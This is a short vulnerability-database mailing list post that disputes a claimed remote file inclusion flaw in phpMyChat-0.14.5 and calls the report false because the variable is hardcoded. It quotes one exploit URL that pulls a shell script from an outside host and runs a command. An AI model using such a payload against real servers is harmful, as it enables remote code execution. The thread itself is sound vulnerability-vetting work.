[VIM] false: phpMyChat-0.14.5

Steven M. Christey coley at linus.mitre.org
Mon Apr 16 01:26:12 UTC 2007


Wow, that's some of the strongest evidence of "grep and gripe" I've seen
yet.  Ouch.

Assuming that PHP doesn't treat "{}" as valid variable characters... ya
never really know with that language.

On Sun, 15 Apr 2007, GM darkfig wrote:

> Link: http://www.securityfocus.com/archive/1/465741/30/0/threaded
> Author: k4rtal[at]gmail[dot]com
>
> Quote from the thread:
> "exploit : phpMyChat.php3?{ChatPath}=http://shelladresin.com/shell.txt?cmd=id"
>
> phpMyChat.php3:
> $ChatPath = "chat/";
> require("./${ChatPath}lib/index.lib.php3");
>


More information about the VIM mailing list